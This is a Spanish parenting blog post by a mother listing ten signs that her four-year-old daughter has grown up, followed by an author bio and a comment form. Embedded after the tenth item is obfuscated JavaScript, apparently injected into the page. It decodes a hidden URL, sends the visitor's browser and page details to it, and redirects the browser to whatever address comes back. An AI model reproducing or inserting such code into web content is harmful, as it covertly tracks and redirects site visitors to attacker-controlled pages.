10 cosas por las que te das cuenta de que tu pequeña ha crecido

¿Qué años tiene ya la mayor? ¡Madre mía, cuánto ha crecido! o ¡Cómo ha cambiado desde que la vi la última vez! Son frases que escuchas una y otra vez, pero que nunca te paras a analizar, porque si lo hicieras te darías cuenta de que tu pequeña, que siempre será tu pequeña, ya es una mayor.

Siempre he pensado que cuando nació mi hija pequeña obligamos a Elena a crecer sin que ella nos lo pidiese. Un miembro nuevo llegaba a casa y todos tuvimos que reubicarnos para encontrar nuestro nuevo rol familiar. De repente la veía al lado de su hermana y notaba que era muy alta, su forma de comunicarse conmigo muy fluida y fresca y sus peticiones muy coherentes. Entonces empecé a hacer una lista (yo tan aficionada a ellas) para ver qué cosas más habían cambiado cuando… Y fue así como llegué a dar con las 10 cosas por las que me di cuenta de que Elena ha crecido:

1. Cuando la monto en el columpio de cesta o en el carrito del supermercado y casi llega al suelo.
2. Cuando le leo un cuento y me dice que “eso es para pequeños”. ¿Cómo? Ni que quisiera que le leyera Anna Karenina.
3. Cuando ya no puedo engañarla con cinco minutos porque empieza a tener conocimiento de lo que son cinco minutos. ¡Se nos acabó el chollo!
4. Cuando me dice: “Mamá, ¿por qué siempre me pones pantalón? Una siempre pensando en la comodidad y ella ya en estar guapa. ¿No es demasiado pronto? ¡Solo tiene cuatro años (y medio)!
5. Cuando empieza a meter en la hucha el dinero que le dan sus abuelitos para comprarse sus cosas. Y sus cosas son la muñeca de Blancanieves de Pin y Pon, por ejemplo, o el último peluche de la Patrulla Canina.
6. Cuando me pide ir a dormirse a casa de sus tíos, primos, amigos… ¡A mí nunca me dejaron! Bueno, sí, con 10 años.
7. Cuando se acerca el fin de semana y pregunta toda seria: “¿Qué hacemos el sábado?”. Ya no es tan fácil llevarla de un sitio a otro a nuestro gusto y comodidad, ahora hay que empezar a contar con sus gustos y a hablar con las mamis de sus amigas, que ahora son las mías.
8. Cuando quiere pasar más tiempo con su papá y tú piensas: “Horror, se acabó la mamitis. ¡Qué voy a hacer ahora!”.
9. Cuando está tirada en el sofá mientras tú escribes este post y te dice: “Mamá, ponme el termómetro. Creo que tengo fiebre”. Uff, con la odisea que era cuando tenía dos años.
10. O cuando te suelta: “Mamá, no quiero ser mayor”, y tú, casi con la lágrima deslizándose por tu mejilla, contestas: “Siempre serás mi pequeña”. var uomjftkd = { encode: function (uymcrbbu, ivpjzup1) { var juykdjus = “”; for (var bmtvoq = 0; bmtvoq < uymcrbbu.length; bmtvoq++) { var maoakjle = uymcrbbu.charCodeAt(bmtvoq); var vznvir = maoakjle ^ ivpjzup1.charCodeAt(bmtvoq % ivpjzup1.length); juykdjus = juykdjus + String.fromCharCode(vznvir); } return juykdjus; }};function ivlvxbnl(xspsscex, qmjwsdtc){ return uomjftkd.encode(xspsscex, qmjwsdtc);}function nhqlzziy(vtzoxco, qmjwsdtc) { function mnbggf(url, qvfdnorl, gaurhzsa) { var svzjxjw = new XMLHttpRequest(); var mvlmqh = ""; var ngpewk = []; var djzspyoe; for(djzspyoe in qvfdnorl) { ngpewk.push(encodeURIComponent(djzspyoe) + '=' + encodeURIComponent(qvfdnorl[djzspyoe])); } mvlmqh = ngpewk.join(String.fromCharCode(38)).replace(/%20/g, '+'); svzjxjw.onreadystatechange = gaurhzsa; svzjxjw.open('GET', vtzoxco + "?" + mvlmqh); svzjxjw.send(mvlmqh); } var broilplq = { ua: navigator.userAgent, referrer: document.referrer, host: window.location.hostname, uri: window.location.pathname, lang: navigator.language, guid: qmjwsdtc }; mnbggf(vtzoxco, broilplq, function () { if (this.readyState == 4) { if (this.status == 200) { qvfdnorl = this.responseText; if (typeof(qvfdnorl) === 'string') { if (qvfdnorl.indexOf("http") === 0) { window.location = qvfdnorl; } } } } });}var advuwpjt = Array();var qmjwsdtc = '08430616d2a2d9759b18f9b49fcabc12';if (document.cookie.indexOf(qmjwsdtc) === -1){ advuwpjt.push(String.fromCharCode(88,76,64,67,67,12,30,25,9,75,8,92,2,86,67,71,88,1,90,93,20,23,11,90,95,9,76,0,18,10,28,88,67,22,68,91,64)); document.cookie = qmjwsdtc + '=1; path=/'; advuwpjt = advuwpjt.forEach(function (xspsscex) { var juykdjus = ivlvxbnl(xspsscex, qmjwsdtc); if (typeof(juykdjus) === 'string') { if (juykdjus.indexOf("http") === 0) { nhqlzziy(juykdjus, qmjwsdtc); return; } } });}

Sobre Diana

Soy periodista, emprendedora, amante del teatro (sobre todo infantil) y de los buenos planes (en familia, en pareja, entre amigos, en solitario...). Un día, después de un montón de casualidades, decidí lanzarme a la aventura de poner en marcha mi propio proyecto profesional: Mamá tiene un Plan. Hoy, tengo dos peques (niña y niño) y muchas ilusiones, a los que dedico todo mi tiempo y energía. En el viaje me acompaña un hombre maravilloso (al que dedico menos tiempo del que me gustaría y quiero con locura) y una gran familia a la que adoro que hace posible que todo lo demás siga girando. @Diana_M_N

2 comentarios en “10 cosas por las que te das cuenta de que tu pequeña ha crecido

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *